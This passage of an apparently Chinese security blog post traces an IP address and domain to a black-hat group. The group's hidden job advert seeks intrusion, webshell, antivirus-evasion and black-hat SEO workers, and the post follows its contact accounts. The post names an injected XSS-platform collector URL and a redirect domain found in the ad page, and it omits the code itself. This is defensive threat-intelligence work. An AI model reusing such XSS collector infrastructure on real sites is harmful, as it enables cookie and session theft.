0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在 23.225.213.107 曾经被扫描到的 banner 信息当中，发现了很有意思的信息（鹰图扫描频率应该比fofa高一些，fofa上没有这条）。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在一个 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXan519[.]com</span></code><span leaf="">  域名的 Banner 上发现了一条招聘安全人员的广告，时间是 2024年6月15号（banner 信息本质上也是历史解析）。</span></p><p><img data-imgfileid="100001544" class="rich_pages wxw-img" data-ratio="0.3957703927492447" data-s="300,640" data-type="png" data-w="3310" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=41ccc7a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9u84sR5rZQYdEKTv9HQticC79XDJnjFQmg45rXYw0cVdhUyVBhPtdwfw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">信息量还是非常大的。</span></p><ol style="list-style-type: decimal;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p><span leaf="">大团队，深耕多年。</span></p></li><li><p><span leaf="">招聘黑帽SEO。</span></p></li><li><p><span leaf="">招聘 windows 安全工程师，能够获取权限。</span></p></li><li><p><span leaf="">招聘 linux 安全工程师，熟悉 php。</span></p></li><li><p><span leaf="">招聘二进制汇编工程师，熟悉安全软件扫描。</span></p></li><li><p><span leaf="">3个注释掉的QQ号，1个微信号，2个✈️号，1个邮箱。</span></p></li></ol><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">看得出来写 JD 的人表达的还是比较内敛一些，虽然没大厂的那么规范，但是大体能 get 到需要 </span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">日站、写🐎、免杀、黑帽SEO</span></strong><span leaf=""> 选手。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">源码如下：</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">略</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">单看没被注释的部分 HTML 是长这样的，除了QQ号是注释掉的，其他部分都是展示出来的。</span></p><p><img data-imgfileid="100001546" class="rich_pages wxw-img" data-ratio="0.5042678923177938" data-s="300,640" data-type="png" data-w="3046" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=819d919c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9Sw5pYz9whp2mUEjGL3PcJvBz4gZeAdE0sBndL74q4a6ORibZz3EQbBQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">@XXX 对应账号，看上去是个个人号。</span></p><p><img data-imgfileid="100001545" class="rich_pages wxw-img" data-ratio="0.3875598086124402" data-s="300,640" data-type="png" data-w="2090" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=918f15d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY92ZpYL67DQ1FVw5gVSj2K3a1YskOb6ZWpZuJVzMo4topIKoYfTlTJPA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">@XXX 对应账号，看上去是一个 &#34;XX会&#34; 盘子的招聘专用号。</span></p><p><img data-imgfileid="100001548" class="rich_pages wxw-img" data-ratio="0.4624390243902439" data-s="300,640" data-type="png" data-w="2050" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=fd9d20d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY92QicTI8Hcb3kL3uaapHHmeely54kxG9j43EOJJUHKrS3lUwiaSRaxfug%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h6 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 14px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">广告页分析拓展</span></span><span style="display: none;"></span></h6><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">除了两个统计 js，源码顶部还插了个 XSS 平台的payload。</span></p><p><img data-imgfileid="100001547" class="rich_pages wxw-img" data-ratio="0.09014675052410902" data-s="300,640" data-type="png" data-w="2862" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=c0e350f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9pNbicK7NIVRKCGDwqOpGY1YdMeSPbacYSdMtOoMxeicsjiaEP4SUAjeIA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">统计，延迟跳转到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://n257[.]top" target="_blank">https://n257[.]top</a></span></code><span leaf=""> 。</span></p><p><img data-imgfileid="100001549" class="rich_pages wxw-img" data-ratio="0.35042219541616404" data-s="300,640" data-type="png" data-w="3316" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=0e5905ff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9xx98v9btHSHaQuCYCKL8ictjw7JbGy0v0FHS3leFzvMKjvBqNgnDclg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">n257[.]top</span></code><span leaf=""> 现在已经打不开了，但是可以看到每天的请求量还是不小的。</span></p><p><img data-imgfileid="100001550" class="rich_pages wxw-img" data-ratio="0.21081081081081082" data-s="300,640" data-type="png" data-w="3330" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5fc839e0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9LS0xpAUu8bDnSeeoRu24iaCicrxOQzF3HEhSR2mXZLDbvSx4BDdmDxWw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">fofa搜索 &#34;<a href="https://xss9.com/FWkB" target="_blank">https://xss9.com/FWkB</a>&#34;，🐮啊（这个 xss 权限是谁的不一定哈）。</span></p><p><img data-imgfileid="100001551" class="rich_pages wxw-img" data-ratio="0.4115384615384615" data-s="300,640" data-type="png" data-w="2080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=aca691f0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY98gWcoNmfyiculxslicLu9iaCvokMFqbodCiamI1k9vQ1G5uRrQMjtWHIhg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">连 403 页面都插我不太理解...</span></p><p><img data-imgfileid="100001552" class="rich_pages wxw-img" data-ratio="0.6063454759106933" data-s="300,640" data-type="png" data-w="1702" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=386da441&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9PTnQa6M2g3kDMxJjcb1w0wYNwg5rjzGq7W9ePjy2iaEIqnKkVTfjzqQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而网站正文的这个saved，说明这个网页也是用 EDGE 保存的</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf="">&lt;!-- saved from url=(0028)<a href="http://hongxing.xcx0351.com/" target="_blank">http://hongxing.xcx0351.com/</a> --&gt;</span></span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这似乎是一个通用广告页面，而这个域名关键字也能搜到一堆SEO相关的东西，甚至还有个传奇私服</span></p><p><img data-imgfileid="100001553" class="rich_pages wxw-img" data-ratio="0.4258589511754069" data-s="300,640" data-type="png" data-w="2212" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=06e3d139&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9blOU7APHTI4xOrJgxwibHThXfT3ib06D0diaHVoeAOnJXRUkFD75YPukA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">title为 “</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">大团队招聘seo,安全测试 v我50看看实力 哈哈 HkZhnagsan</span></strong><span leaf="">”，HkZhnagsan 可能是敲错了？纠正过来应该是 HkZhangsan 黑客张三？</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这里的两张图都是随手一搜了，无太大意义。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">略</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而搜索QQ号能得到更加直接的页面</span></p><p><img data-imgfileid="100001554" class="rich_pages wxw-img" data-ratio="0.41597510373443985" data-s="300,640" data-type="png" data-w="1928" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=99e84ae4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9Eg5mYlhyIJpLEKBicTJVpicXe1bUwZJQPGOWYBYZWLpfRGWeNaHNxeoQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://XXX/" target="_blank">http://XXX/</a></span></code><span leaf=""> （其他端口有黄色内容，不确定是被黑还是自己搭建的服务）。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这里没写出来要招聘写🐴的，只写了白帽 SEO 和 &#34;安全工程师&#34;，一开始我还以为是低调。</span></p><p><img data-imgfileid="100001555" class="rich_pages wxw-img" data-ratio="0.8730964467005076" data-s="300,640" data-type="png" data-w="2364" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6a0c92de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9RpGIqRjORRPhsH2o98Q37FRW0gjibU0dwmxqz3IA0wJal39viaGpzENQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">原来隐藏岗位在源文件里（学百度是吧），这纯纯攻击队啊。收 0day、黑帽 SEO、后门远控权限维持。</span></p><p><img data-imgfileid="100001557" class="rich_pages wxw-img" data-ratio="0.2005813953488372" data-s="300,640" data-type="png" data-w="3440" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=056070bb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY92HErlVPPbLCr6jaqNTuyicaGpgx3rx6G6fLL95ZZGwuKVqV76RmiaeTA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">图里没注释的 QQ 号是 XXXX，是一开始找到的网页源码中被注释掉的 3 个 QQ 号之一。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">@XXXX 对应的账号</span></p><p><img data-imgfileid="100001556" class="rich_pages wxw-img" data-ratio="0.411214953271028" data-s="300,640" data-type="png" data-w="1712" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=187d6570&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9ZaznYUFict1iaibW2xn1AF5ibI2SH9HVNzhJjXhquk71z7pQfrEare6c3Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">@XXXX</span></p><p><img data-imgfileid="100001558" class="rich_pages wxw-img" data-ratio="0.39493136219640973" data-s="300,640" data-type="png" data-w="1894" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=df31952a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY90KaxoXicicODl3YL6sWMya5IY8pmaribZ7EqgC7DWfHjR2P50Q2YGgsmg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">fofa搜索QQ号可以发现很多业务广告（有可能只是偷了个模板把被注释掉的 QQ 号带过去了而已）。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">各种海产广告略。</span><span leaf=""><br/></span></code></pre><h6 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 14px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">关系论证</span></span><span style="display: none;"></span></h6><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 